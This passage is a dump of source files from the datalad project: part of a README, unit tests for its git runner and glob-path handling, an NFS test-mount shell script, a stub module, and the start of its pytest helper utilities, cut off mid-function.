(mandatory).\n\n``branch``\n----------\n\nGit branch to install (optional).\n\n``install_path``\n----------------\n\nPath to install the dataset relative to `GITHUB_WORKSPACE`.\n\nDefaults to the repository name.\n\n``install_jobs``\n----------------\n\nJobs to use for ``datalad install``.\n\nDefaults to ``auto``.\n\n``install_get_data``\n--------------------\n\nGet all the data in the dataset by passing ``--get-data`` to ``datalad install``.\n\nDefaults to ``false``.\n\n``recursive``\n-------------\n\nBoolean defining whether to clone subdatasets.\n\nDefaults to ``true``.\n\n``recursion_limit``\n-------------------\n\nInteger defining limits to recursion.\n\nIf not defined, there is no limit.\n\n``get_jobs``\n------------\n\nJobs to use for ``datalad get``.\n\nDefaults to ``auto``.\n\n\n``get_paths``\n-------------\n\nA list of paths in the dataset to download with ``datalad get``.\n\nDefaults to everything.\n" }, { "alpha_fraction": 0.6530843377113342, "alphanum_fraction": 0.66270512342453, "avg_line_length": 39.15909194946289, "blob_id": "59eaeaeb58839bb864a480bf6bccbcccf0452310", "content_id": "db3be69b7391471eedf55698daf7356c073b64c9", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1767, "license_type": "permissive", "max_line_length": 70, "num_lines": 44, "path": "/datalad/runner/tests/test_gitrunner.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "from __future__ import annotations\n\nfrom unittest.mock import patch\n\nfrom datalad.runner.coreprotocols import StdOutErrCapture\nfrom datalad.runner.protocol import GeneratorMixIn\nfrom datalad.tests.utils_pytest import assert_equal\n\nfrom ..gitrunner import GitWitlessRunner\n\n\nclass TestGeneratorProtocol(GeneratorMixIn, StdOutErrCapture):\n\n __test__ = False # class is not a class of tests\n\n\ndef test_gitrunner_generator() -> None:\n # Expect GitRunner._get_chunked_results() to return generators,\n # if the protocol is a subclass of GeneratorMixIn, and expect\n # run_on_filelist_chunks_items_ to yield elements from\n # all generators returned by GitRunner._get_chunked_results().\n git_runner = GitWitlessRunner([\"a\", \"b\", \"c\"])\n generator = git_runner.run_on_filelist_chunks_items_(\n [\"a\", \"b\", \"c\"],\n [\"f1.txt\", \"f2.txt\"],\n protocol=TestGeneratorProtocol)\n with patch.object(git_runner, \"_get_chunked_results\") as get_mock:\n get_mock.return_value = (range(2), range(3))\n assert_equal(tuple(generator), (0, 1, 0, 1, 2))\n\n\ndef test_gitrunner_list() -> None:\n # Expect GitRunner._get_chunked_results() to return generators,\n # if the protocol is a subclass of GeneratorMixIn, and expect\n # run_on_filelist_chunks_items_ to yield elements from\n # all generators returned by GitRunner._get_chunked_results().\n git_runner = GitWitlessRunner([\"a\", \"b\", \"c\"])\n with patch.object(git_runner, \"_get_chunked_results\") as get_mock:\n get_mock.return_value = ({\"a\": 1, \"b\": 2}, {\"a\": 3, \"b\": 4})\n result = git_runner.run_on_filelist_chunks(\n [\"a\", \"b\", \"c\"],\n [\"f1.txt\", \"f2.txt\"],\n protocol=StdOutErrCapture)\n assert_equal(result, {\"a\": 4, \"b\": 6})\n" }, { "alpha_fraction": 0.6861081719398499, "alphanum_fraction": 0.6861081719398499, "avg_line_length": 19.955554962158203, "blob_id": "27e0c29524e9e5636dcb738160dd85caebd84a55", "content_id": "37728a67701c3302262d99e680c64627e520f448", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 943, "license_type": "permissive", "max_line_length": 78, "num_lines": 45, "path": "/tools/eval_under_nfs", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# Evaluate given command while running with DATALAD_TESTS_TEMP_DIR pointing to\n# that temporary filesystem mounted using nfs\n\nset -e\n\nfs=nfs\n# TODO: nfs and mount options?\n\nset -u\ntmp=$(mktemp -u \"${TMPDIR:-/tmp}/datalad-nfs-XXXXX\")\n\n\nuid=$(id -u)\nmntorig=\"$tmp.orig\"\nmntpoint=\"$tmp.nfs\"\n\necho \"I: mounting $mntorig under $mntpoint via $fs\"\n\nset -x\n\nmkdir -p \"$mntpoint\"\nmkdir -p \"$mntorig\"\n\nif ! dpkg -l nfs-kernel-server | grep '^ii.*nfs-kernel-server'; then\n sudo apt-get install -y nfs-kernel-server\nfi\n\nsudo exportfs -o rw \"localhost:$mntorig\"\nsudo mount -t \"$fs\" \"localhost:$mntorig\" \"$mntpoint\"\n\n# should how it was mounted\nsudo mount | grep \"$mntpoint\" | sed -e 's,^,I: ,g'\n\n# Run the actual command\necho \"I: running $@\"\nTMPDIR=\"$mntpoint\" DATALAD_TESTS_TEMP_DIR=\"$mntpoint\" \"$@\"\nret=$?\n\necho \"I: done, unmounting\"\nsudo umount \"$mntpoint\"\nsudo exportfs -u \"localhost:$mntorig\"\n\nrm -rf \"$mntpoint\" \"$mntorig\"\nexit \"$ret\"\n" }, { "alpha_fraction": 0.8070175647735596, "alphanum_fraction": 0.8070175647735596, "avg_line_length": 56, "blob_id": "945fd6b0f469dd3f912ce1bfa910585dcae1e29a", "content_id": "7b87ba917f580859df6092f84ee7c07f967293d1", "detected_licenses": [ "BSD-3-Clause", "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 57, "license_type": "permissive", "max_line_length": 56, "num_lines": 1, "path": "/tools/testing/bad_internals/_scrapy/scrapy.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "raise ImportError(\"Scrapy import is ruined for testing\")\n" }, { "alpha_fraction": 0.4740850031375885, "alphanum_fraction": 0.48624417185783386, "avg_line_length": 37.956939697265625, "blob_id": "342a87496a9fcf0341c28984e2b7d9dfa312dd61", "content_id": "f7f526c0fc47613a272c254a30c9cf1db2eb479b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8142, "license_type": "permissive", "max_line_length": 106, "num_lines": 209, "path": "/datalad/support/tests/test_globbedpaths.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-; coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"test GlobbedPaths\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\nimport os.path as op\nfrom itertools import product\nfrom unittest.mock import patch\n\nfrom datalad.tests.utils_pytest import (\n OBSCURE_FILENAME,\n assert_in,\n eq_,\n swallow_logs,\n with_tree,\n)\n\nfrom ..globbedpaths import GlobbedPaths\n\n\ndef test_globbedpaths_get_sub_patterns():\n gp = GlobbedPaths([], \"doesn't matter\")\n for pat, expected in [\n # If there are no patterns in the directory component, we get no\n # sub-patterns.\n (\"\", []),\n (\"nodir\", []),\n (op.join(\"nomagic\", \"path\"), []),\n (op.join(\"nomagic\", \"path*\"), []),\n # Create sub-patterns from leading path, successively dropping the\n # right-most component.\n (op.join(\"s*\", \"path\"), [\"s*\" + op.sep]),\n (op.join(\"s\", \"ss*\", \"path\"), [op.join(\"s\", \"ss*\") + op.sep]),\n (op.join(\"s\", \"ss*\", \"path*\"), [op.join(\"s\", \"ss*\") + op.sep]),\n (op.join(\"s\", \"ss*\" + op.sep), []),\n (op.join(\"s*\", \"ss\", \"path*\"),\n [op.join(\"s*\", \"ss\") + op.sep,\n \"s*\" + op.sep]),\n (op.join(\"s?\", \"ss\", \"sss*\", \"path*\"),\n [op.join(\"s?\", \"ss\", \"sss*\") + op.sep,\n op.join(\"s?\", \"ss\") + op.sep,\n \"s?\" + op.sep])]:\n eq_(gp._get_sub_patterns(pat), expected)\n\n\nbOBSCURE_FILENAME = f\"b{OBSCURE_FILENAME}.dat\"\n\n\n@with_tree(tree={\"1.txt\": \"\",\n \"2.dat\": \"\",\n \"3.txt\": \"\",\n bOBSCURE_FILENAME: \"\",\n \"subdir\": {\"1.txt\": \"\", \"2.txt\": \"\", \"subsub\": {\"3.dat\": \"\"}}})\ndef test_globbedpaths(path=None):\n dotdir = op.curdir + op.sep\n\n for patterns, expected in [\n ([\"1.txt\", \"2.dat\"], {\"1.txt\", \"2.dat\"}),\n ([dotdir + \"1.txt\", \"2.dat\"], {dotdir + \"1.txt\", \"2.dat\"}),\n ([\"*.txt\", \"*.dat\"], {\"1.txt\", \"2.dat\", bOBSCURE_FILENAME, \"3.txt\"}),\n ([dotdir + \"*.txt\", \"*.dat\"],\n {dotdir + \"1.txt\", \"2.dat\", bOBSCURE_FILENAME, dotdir + \"3.txt\"}),\n ([op.join(\"subdir\", \"*.txt\")],\n {op.join(\"subdir\", \"1.txt\"), op.join(\"subdir\", \"2.txt\")}),\n ([\"subdir\" + op.sep], {\"subdir\" + op.sep}),\n ([dotdir + op.join(\"subdir\", \"*.txt\")],\n {dotdir + op.join(*ps)\n for ps in [(\"subdir\", \"1.txt\"), (\"subdir\", \"2.txt\")]}),\n ([\"*.txt\"], {\"1.txt\", \"3.txt\"}),\n ([op.join(\"subdir\", \"**\")],\n {op.join(*ps)\n for ps in [(\"subdir\" + op.sep,), (\"subdir\", \"subsub\"),\n (\"subdir\", \"1.txt\"), (\"subdir\", \"2.txt\"),\n (\"subdir\", \"subsub\", \"3.dat\")]}),\n ([dotdir + op.join(\"**\", \"*.dat\")],\n {dotdir + op.join(\"2.dat\"), dotdir + bOBSCURE_FILENAME,\n dotdir + op.join(\"subdir\", \"subsub\", \"3.dat\")})]:\n gp = GlobbedPaths(patterns, pwd=path)\n eq_(set(gp.expand()), expected)\n eq_(set(gp.expand(full=True)),\n {op.join(path, p) for p in expected})\n\n pardir = op.pardir + op.sep\n subdir_path = op.join(path, \"subdir\")\n for patterns, expected in [\n ([\"*.txt\"], {\"1.txt\", \"2.txt\"}),\n ([dotdir + \"*.txt\"], {dotdir + p for p in [\"1.txt\", \"2.txt\"]}),\n ([pardir + \"*.txt\"], {pardir + p for p in [\"1.txt\", \"3.txt\"]}),\n ([dotdir + pardir + \"*.txt\"],\n {dotdir + pardir + p for p in [\"1.txt\", \"3.txt\"]}),\n # Patterns that don't match are retained by default.\n ([\"amiss\"], {\"amiss\"})]:\n gp = GlobbedPaths(patterns, pwd=subdir_path)\n eq_(set(gp.expand()), expected)\n eq_(set(gp.expand(full=True)),\n {op.join(subdir_path, p) for p in expected})\n\n # Full patterns still get returned as relative to pwd.\n gp = GlobbedPaths([op.join(path, \"*.dat\")], pwd=path)\n eq_(gp.expand(), [\"2.dat\", bOBSCURE_FILENAME])\n\n # \".\" gets special treatment.\n gp = GlobbedPaths([\".\", \"*.dat\"], pwd=path)\n eq_(set(gp.expand()), {\"2.dat\", bOBSCURE_FILENAME, \".\"})\n eq_(gp.expand(dot=False), [\"2.dat\", bOBSCURE_FILENAME])\n gp = GlobbedPaths([\".\"], pwd=path, expand=False)\n eq_(gp.expand(), [\".\"])\n eq_(gp.paths, [\".\"])\n\n # We can the glob outputs.\n glob_results = {\"z\": \"z\",\n \"a\": [\"x\", \"d\", \"b\"]}\n with patch('glob.glob', lambda k, **kwargs: glob_results[k]):\n gp = GlobbedPaths([\"z\", \"a\"])\n eq_(gp.expand(), [\"z\", \"b\", \"d\", \"x\"])\n\n # glob expansion for paths property is determined by expand argument.\n for expand, expected in [(True, [\"2.dat\", bOBSCURE_FILENAME]),\n (False, [\"*.dat\"])]:\n gp = GlobbedPaths([\"*.dat\"], pwd=path, expand=expand)\n eq_(gp.paths, expected)\n\n with swallow_logs(new_level=logging.DEBUG) as cml:\n GlobbedPaths([\"not here\"], pwd=path).expand()\n assert_in(\"No matching files found for 'not here'\", cml.out)\n\n\n@with_tree(tree={\"1.txt\": \"\", \"2.dat\": \"\", \"3.txt\": \"\"})\ndef test_globbedpaths_misses(path=None):\n gp = GlobbedPaths([\"amiss\"], pwd=path)\n eq_(gp.expand_strict(), [])\n eq_(gp.misses, [\"amiss\"])\n eq_(gp.expand(include_misses=True), [\"amiss\"])\n\n # miss at beginning\n gp = GlobbedPaths([\"amiss\", \"*.txt\", \"*.dat\"], pwd=path)\n eq_(gp.expand_strict(), [\"1.txt\", \"3.txt\", \"2.dat\"])\n eq_(gp.expand(include_misses=True),\n [\"amiss\", \"1.txt\", \"3.txt\", \"2.dat\"])\n\n # miss in middle\n gp = GlobbedPaths([\"*.txt\", \"amiss\", \"*.dat\"], pwd=path)\n eq_(gp.expand_strict(), [\"1.txt\", \"3.txt\", \"2.dat\"])\n eq_(gp.misses, [\"amiss\"])\n eq_(gp.expand(include_misses=True),\n [\"1.txt\", \"3.txt\", \"amiss\", \"2.dat\"])\n\n # miss at end\n gp = GlobbedPaths([\"*.txt\", \"*.dat\", \"amiss\"], pwd=path)\n eq_(gp.expand_strict(), [\"1.txt\", \"3.txt\", \"2.dat\"])\n eq_(gp.misses, [\"amiss\"])\n eq_(gp.expand(include_misses=True),\n [\"1.txt\", \"3.txt\", \"2.dat\", \"amiss\"])\n\n # miss at beginning, middle, and end\n gp = GlobbedPaths([\"amiss1\", \"amiss2\", \"*.txt\", \"amiss3\", \"*.dat\",\n \"amiss4\"],\n pwd=path)\n eq_(gp.expand_strict(), [\"1.txt\", \"3.txt\", \"2.dat\"])\n eq_(gp.misses, [\"amiss1\", \"amiss2\", \"amiss3\", \"amiss4\"])\n eq_(gp.expand(include_misses=True),\n [\"amiss1\", \"amiss2\", \"1.txt\", \"3.txt\", \"amiss3\", \"2.dat\", \"amiss4\"])\n\n # Property expands if needed.\n gp = GlobbedPaths([\"amiss\"], pwd=path)\n eq_(gp.misses, [\"amiss\"])\n\n\n@with_tree(tree={\"adir\": {},\n \"bdir\": {},\n \"other\": {},\n \"1.txt\": \"\", \"2.dat\": \"\", \"3.txt\": \"\"})\ndef test_globbedpaths_partial_matches(path=None):\n gp = GlobbedPaths([op.join(\"?dir\", \"*.txt\"), \"*.txt\"], pwd=path)\n eq_(gp.expand_strict(), [\"1.txt\", \"3.txt\"])\n\n expected_partial = [\"adir\" + op.sep, \"bdir\" + op.sep]\n eq_(gp.partial_hits, expected_partial)\n eq_(gp.expand(include_partial=True),\n expected_partial + [\"1.txt\", \"3.txt\"])\n\n # Property expands if needed.\n gp = GlobbedPaths([op.join(\"?dir\", \"*.txt\")], pwd=path)\n eq_(gp.partial_hits, expected_partial)\n\n\n@with_tree(tree={\"1.txt\": \"\",\n \"2.dat\": \"\",\n \"3.txt\": \"\",\n \"foo.dat\": \"\"})\ndef test_globbedpaths_cached(path=None):\n # Smoke test to trigger cache handling.\n gp = GlobbedPaths([op.join(\"?\", \".dat\"), \"*.txt\"], pwd=path)\n for full, partial, misses in product([False, True], repeat=3):\n eq_(gp.expand(full=full,\n include_misses=misses,\n include_partial=partial),\n gp.expand(full=full,\n include_misses=misses,\n include_partial=partial))\n" }, { "alpha_fraction": 0.5967428684234619, "alphanum_fraction": 0.6015976667404175, "avg_line_length": 31.648414611816406, "blob_id": "a4ff727e9c6f4c500e65236389048d96e68c314d", "content_id": "191f3b1e8ae9ddda1fad260daa6d6c9f0804ce8b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 68104, "license_type": "permissive", "max_line_length": 153, "num_lines": 2082, "path": "/datalad/tests/utils_pytest.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil; coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Miscellaneous utilities to assist with testing\"\"\"\n\nimport base64\nimport lzma\nimport multiprocessing\nimport multiprocessing.queues\nimport ssl\nimport textwrap\nfrom difflib import unified_diff\nfrom http.server import (\n HTTPServer,\n SimpleHTTPRequestHandler,\n)\nfrom json import dumps\nfrom unittest import SkipTest\nfrom unittest.mock import patch\n\nimport pytest\n\nimport datalad.utils as ut\nfrom datalad import cfg as dl_cfg\nfrom datalad.cmd import (\n StdOutErrCapture,\n WitlessRunner,\n)\n\nfrom datalad import utils\nfrom datalad.consts import ARCHIVES_TEMP_DIR\nfrom datalad.dochelpers import borrowkwargs\n\nfrom datalad.support.external_versions import (\n external_versions,\n get_rsync_version,\n)\nfrom datalad.support.keyring_ import MemoryKeyring\nfrom datalad.support.network import RI\nfrom datalad.support.vcr_ import *\n# TODO this must go\nfrom datalad.utils import *\n\n\n# temp paths used by clones\n_TEMP_PATHS_CLONES = set()\n\n\n# Additional indicators\non_travis = bool(os.environ.get('TRAVIS', False))\non_appveyor = bool(os.environ.get('APPVEYOR', False))\non_nfs = 'nfs' in os.getenv('TMPDIR', '')\n\nif external_versions[\"cmd:git\"] >= \"2.28\":\n # The specific value here doesn't matter, but it should not be the default\n # from any Git version to test that we work with custom values.\n DEFAULT_BRANCH = \"dl-test-branch\" # Set by setup_package().\nelse:\n DEFAULT_BRANCH = \"master\"\n\nif external_versions[\"cmd:git\"] >= \"2.30.0\":\n # The specific value here doesn't matter, but it should not be the default\n # from any Git version to test that we work with custom values.\n DEFAULT_REMOTE = \"dl-test-remote\" # Set by setup_package().\nelse:\n DEFAULT_REMOTE = \"origin\"\n\ndef attr(name):\n return getattr(pytest.mark, name)\n\ndef assert_equal(first, second, msg=None):\n if msg is None:\n assert first == second\n else:\n assert first == second, msg\n\ndef assert_false(expr, msg=None):\n if msg is None:\n assert not expr\n else:\n assert not expr, msg\n\ndef assert_greater(first, second, msg=None):\n if msg is None:\n assert first > second\n else:\n assert first > second, msg\n\ndef assert_greater_equal(first, second, msg=None):\n if msg is None:\n assert first >= second\n else:\n assert first >= second, msg\n\ndef assert_in(first, second, msg=None):\n if msg is None:\n assert first in second\n else:\n assert first in second, msg\n\nin_ = assert_in\n\ndef assert_is(first, second, msg=None):\n if msg is None:\n assert first is second\n else:\n assert first is second, msg\n\ndef assert_is_instance(first, second, msg=None):\n if msg is None:\n assert isinstance(first, second)\n else:\n assert isinstance(first, second), msg\n\ndef assert_is_none(expr, msg=None):\n if msg is None:\n assert expr is None\n else:\n assert expr is None, msg\n\ndef assert_is_not(first, second, msg=None):\n if msg is None:\n assert first is not second\n else:\n assert first is not second, msg\n\ndef assert_is_not_none(expr, msg=None):\n if msg is None:\n assert expr is not None\n else:\n assert expr is not None, msg\n\ndef assert_not_equal(first, second, msg=None):\n if msg is None:\n assert first != second\n else:\n assert first != second, msg\n\ndef assert_not_in(first, second, msg=None):\n if msg is None:\n assert first not in second\n else:\n assert first not in second, msg\n\ndef assert_not_is_instance(first, second, msg=None):\n if msg is None:\n assert not isinstance(first, second)\n else:\n assert not isinstance(first, second), msg\n\nassert_raises = pytest.raises\n\nassert_set_equal = assert_equal\n\ndef assert_true(expr, msg=None):\n if msg is None:\n assert expr\n else:\n assert expr, msg\n\neq_ = assert_equal\n\nok_ = assert_true\n\n# additional shortcuts\nneq_ = assert_not_equal\nnok_ = assert_false\n\nlgr = logging.getLogger(\"datalad.tests.utils_pytest\")\n\n\ndef skip_if_no_module(module):\n # Using pytest.importorskip here won't always work, as some imports (e.g.,\n # libxmp) can fail with exceptions other than ImportError\n try:\n imp = __import__(module)\n except Exception as exc:\n pytest.skip(\"Module %s fails to load\" % module, allow_module_level=True)\n\n\ndef skip_if_scrapy_without_selector():\n \"\"\"A little helper to skip some tests which require recent scrapy\"\"\"\n try:\n import scrapy\n from scrapy.selector import Selector\n except ImportError:\n pytest.skip(\n \"scrapy misses Selector (too old? version: %s)\"\n % getattr(scrapy, '__version__'))\n\n\ndef skip_if_url_is_not_available(url, regex=None):\n # verify that dataset is available\n from datalad.downloaders.base import DownloadError\n from datalad.downloaders.providers import Providers\n providers = Providers.from_config_files()\n try:\n content = providers.fetch(url)\n if regex and re.search(regex, content):\n pytest.skip(\"%s matched %r -- skipping the test\" % (url, regex))\n except DownloadError:\n pytest.skip(\"%s failed to download\" % url)\n\n\ndef check_not_generatorfunction(func):\n \"\"\"Internal helper to verify that we are not decorating generator tests\"\"\"\n if inspect.isgeneratorfunction(func):\n raise RuntimeError(\"{}: must not be decorated, is a generator test\"\n .format(func.__name__))\n\n\ndef skip_if_no_network(func=None):\n \"\"\"Skip test completely in NONETWORK settings\n\n If not used as a decorator, and just a function, could be used at the module level\n \"\"\"\n check_not_generatorfunction(func)\n\n def check_and_raise():\n if dl_cfg.get('datalad.tests.nonetwork'):\n pytest.skip(\"Skipping since no network settings\", allow_module_level=True)\n\n if func:\n @wraps(func)\n @attr('network')\n @attr('skip_if_no_network')\n def _wrap_skip_if_no_network(*args, **kwargs):\n check_and_raise()\n return func(*args, **kwargs)\n return _wrap_skip_if_no_network\n else:\n check_and_raise()\n\n\ndef skip_if_on_windows(func=None):\n \"\"\"Skip test completely under Windows\n \"\"\"\n check_not_generatorfunction(func)\n\n def check_and_raise():\n if on_windows:\n pytest.skip(\"Skipping on Windows\")\n\n if func:\n @wraps(func)\n @attr('skip_if_on_windows')\n def _wrap_skip_if_on_windows(*args, **kwargs):\n check_and_raise()\n return func(*args, **kwargs)\n return _wrap_skip_if_on_windows\n else:\n check_and_raise()\n\n\ndef skip_if_root(func=None):\n \"\"\"Skip test if uid == 0.\n\n Note that on Windows (or anywhere else `os.geteuid` is not available) the\n test is _not_ skipped.\n \"\"\"\n check_not_generatorfunction(func)\n\n def check_and_raise():\n if hasattr(os, \"geteuid\") and os.geteuid() == 0:\n pytest.skip(\"Skipping: test assumptions fail under root\")\n\n if func:\n @wraps(func)\n @attr('skip_if_root')\n def _wrap_skip_if_root(*args, **kwargs):\n check_and_raise()\n return func(*args, **kwargs)\n return _wrap_skip_if_root\n else:\n check_and_raise()\n\n\n@optional_args\ndef skip_if(func, cond=True, msg=None, method='raise'):\n \"\"\"Skip test for specific condition\n\n Parameters\n ----------\n cond: bool\n condition on which to skip\n msg: str\n message to print if skipping\n method: str\n either 'raise' or 'pass'. Whether to skip by raising `SkipTest` or by\n just proceeding and simply not calling the decorated function.\n This is particularly meant to be used, when decorating single assertions\n in a test with method='pass' in order to not skip the entire test, but\n just that assertion.\n \"\"\"\n\n check_not_generatorfunction(func)\n\n @wraps(func)\n def _wrap_skip_if(*args, **kwargs):\n if cond:\n if method == 'raise':\n pytest.skip(msg if msg else \"condition was True\")\n elif method == 'pass':\n print(msg if msg else \"condition was True\")\n return\n return func(*args, **kwargs)\n return _wrap_skip_if\n\n\ndef skip_ssh(func):\n \"\"\"Skips SSH tests if on windows or if environment variable\n DATALAD_TESTS_SSH was not set\n \"\"\"\n\n check_not_generatorfunction(func)\n\n @wraps(func)\n @attr('skip_ssh')\n def _wrap_skip_ssh(*args, **kwargs):\n test_ssh = dl_cfg.get(\"datalad.tests.ssh\", '')\n if not test_ssh or test_ssh in ('0', 'false', 'no'):\n raise SkipTest(\"Run this test by setting DATALAD_TESTS_SSH\")\n return func(*args, **kwargs)\n return _wrap_skip_ssh\n\n\ndef skip_nomultiplex_ssh(func):\n \"\"\"Skips SSH tests if default connection/manager does not support multiplexing\n\n e.g. currently on windows or if set via datalad.ssh.multiplex-connections config variable\n \"\"\"\n\n check_not_generatorfunction(func)\n from ..support.sshconnector import (\n MultiplexSSHManager,\n SSHManager,\n )\n\n @wraps(func)\n @attr('skip_nomultiplex_ssh')\n @skip_ssh\n def _wrap_skip_nomultiplex_ssh(*args, **kwargs):\n if SSHManager is not MultiplexSSHManager:\n pytest.skip(\"SSH without multiplexing is used\")\n return func(*args, **kwargs)\n return _wrap_skip_nomultiplex_ssh\n\n#\n# Addition \"checkers\"\n#\n\nimport os\n\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.annexrepo import (\n AnnexRepo,\n FileNotInAnnexError,\n)\nfrom datalad.support.gitrepo import GitRepo\n\nfrom ..utils import (\n chpwd,\n getpwd,\n)\n\n\ndef ok_clean_git(path, annex=None, index_modified=[], untracked=[]):\n \"\"\"Obsolete test helper. Use assert_repo_status() instead.\n\n Still maps a few common cases to the new helper, to ease transition\n in extensions.\n \"\"\"\n kwargs = {}\n if index_modified:\n kwargs['modified'] = index_modified\n if untracked:\n kwargs['untracked'] = untracked\n assert_repo_status(\n path,\n annex=annex,\n **kwargs,\n )\n\n\ndef ok_file_under_git(path, filename=None, annexed=False):\n \"\"\"Test if file is present and under git/annex control\n\n If relative path provided, then test from current directory\n \"\"\"\n annex, file_repo_path, filename, path, repo = _prep_file_under_git(path, filename)\n assert_in(file_repo_path, repo.get_indexed_files()) # file is known to Git\n\n if annex:\n in_annex = 'key' in repo.get_file_annexinfo(file_repo_path)\n else:\n in_annex = False\n\n assert(annexed == in_annex)\n\n\ndef put_file_under_git(path, filename=None, content=None, annexed=False):\n \"\"\"Place file under git/annex and return used Repo\n \"\"\"\n annex, file_repo_path, filename, path, repo = _prep_file_under_git(path, filename)\n if content is None:\n content = \"\"\n with open(opj(repo.path, file_repo_path), 'w') as f_:\n f_.write(content)\n\n if annexed:\n if not isinstance(repo, AnnexRepo):\n repo = AnnexRepo(repo.path)\n repo.add(file_repo_path)\n else:\n repo.add(file_repo_path, git=True)\n repo.commit(_datalad_msg=True)\n ok_file_under_git(repo.path, file_repo_path, annexed)\n return repo\n\n\ndef _prep_file_under_git(path, filename):\n \"\"\"Get instance of the repository for the given filename\n\n Helper to be used by few functions\n \"\"\"\n path = Path(path)\n if filename is None:\n # path provides the path and the name\n filename = Path(path.name)\n path = path.parent\n else:\n filename = Path(filename)\n\n ds = Dataset(utils.get_dataset_root(path))\n\n return isinstance(ds.repo, AnnexRepo), \\\n str(path.absolute().relative_to(ds.path) / filename) \\\n if not filename.is_absolute() \\\n else str(filename.relative_to(ds.pathobj)), \\\n filename, \\\n str(path), \\\n ds.repo\n\n\ndef get_annexstatus(ds, paths=None):\n \"\"\"Report a status for annexed contents.\n Assembles states for git content info, amended with annex info on 'HEAD'\n (to get the last committed stage and with it possibly vanished content),\n and lastly annex info wrt to the present worktree, to also get info on\n added/staged content this fuses the info reported from\n - git ls-files\n - git annex findref HEAD\n - git annex find --include '*'\"\"\"\n info = ds.get_content_annexinfo(\n paths=paths,\n eval_availability=False,\n init=ds.get_content_annexinfo(\n paths=paths,\n ref='HEAD',\n eval_availability=False,\n init=ds.status(\n paths=paths,\n eval_submodule_state='full')\n )\n )\n ds._mark_content_availability(info)\n return info\n\n#\n# Helpers to test symlinks\n#\n\ndef ok_symlink(path):\n \"\"\"Checks whether path is either a working or broken symlink\"\"\"\n link_path = os.path.islink(path)\n if not link_path:\n raise AssertionError(\"Path {} seems not to be a symlink\".format(path))\n\n\ndef ok_good_symlink(path):\n ok_symlink(path)\n rpath = Path(path).resolve()\n ok_(rpath.exists(),\n msg=\"Path {} seems to be missing. Symlink {} is broken\".format(\n rpath, path))\n\n\ndef ok_broken_symlink(path):\n ok_symlink(path)\n rpath = Path(path).resolve()\n assert_false(rpath.exists(),\n msg=\"Path {} seems to be present. Symlink {} is not broken\".format(\n rpath, path))\n\n\ndef ok_startswith(s, prefix):\n ok_(s.startswith(prefix),\n msg=\"String %r doesn't start with %r\" % (s, prefix))\n\n\ndef ok_endswith(s, suffix):\n ok_(s.endswith(suffix),\n msg=\"String %r doesn't end with %r\" % (s, suffix))\n\n\ndef nok_startswith(s, prefix):\n assert_false(s.startswith(prefix),\n msg=\"String %r starts with %r\" % (s, prefix))\n\n\ndef ok_git_config_not_empty(ar):\n \"\"\"Helper to verify that nothing rewritten the config file\"\"\"\n # TODO: we don't support bare -- do we?\n assert_true(os.stat(opj(ar.path, '.git', 'config')).st_size)\n\n\ndef ok_annex_get(ar, files, network=True):\n \"\"\"Helper to run .get decorated checking for correct operation\n\n get passes through stderr from the ar to the user, which pollutes\n screen while running tests\n\n Note: Currently not true anymore, since usage of --json disables\n progressbars\n \"\"\"\n ok_git_config_not_empty(ar) # we should be working in already inited repo etc\n with swallow_outputs() as cmo:\n ar.get(files)\n # verify that load was fetched\n ok_git_config_not_empty(ar) # whatever we do shouldn't destroy the config file\n has_content = ar.file_has_content(files)\n if isinstance(has_content, bool):\n ok_(has_content)\n else:\n ok_(all(has_content))\n\n\ndef ok_generator(gen):\n assert_true(inspect.isgenerator(gen), msg=\"%s is not a generator\" % gen)\n\n\nassert_is_generator = ok_generator # just an alias\n\n\ndef ok_archives_caches(repopath, n=1, persistent=None):\n \"\"\"Given a path to repository verify number of archives\n\n Parameters\n ----------\n repopath : str\n Path to the repository\n n : int, optional\n Number of archives directories to expect\n persistent: bool or None, optional\n If None -- both persistent and not count.\n \"\"\"\n # looking into subdirectories\n glob_ptn = opj(repopath,\n ARCHIVES_TEMP_DIR + {None: '*', True: '', False: '-*'}[persistent],\n '*')\n dirs = glob.glob(glob_ptn)\n n2 = n * 2 # per each directory we should have a .stamp file\n assert_equal(len(dirs), n2,\n msg=\"Found following dirs when needed %d of them: %s\" % (n2, dirs))\n\n\ndef ok_exists(path):\n assert Path(path).exists(), 'path %s does not exist (or dangling symlink)' % path\n\n\ndef ok_file_has_content(path, content, strip=False, re_=False,\n decompress=False, **kwargs):\n \"\"\"Verify that file exists and has expected content\"\"\"\n path = Path(path)\n ok_exists(path)\n if decompress:\n if path.suffix == '.gz':\n open_func = gzip.open\n elif path.suffix in ('.xz', '.lzma'):\n open_func = lzma.open\n else:\n raise NotImplementedError(\"Don't know how to decompress %s\" % path)\n else:\n open_func = open\n\n with open_func(str(path), 'rb') as f:\n file_content = 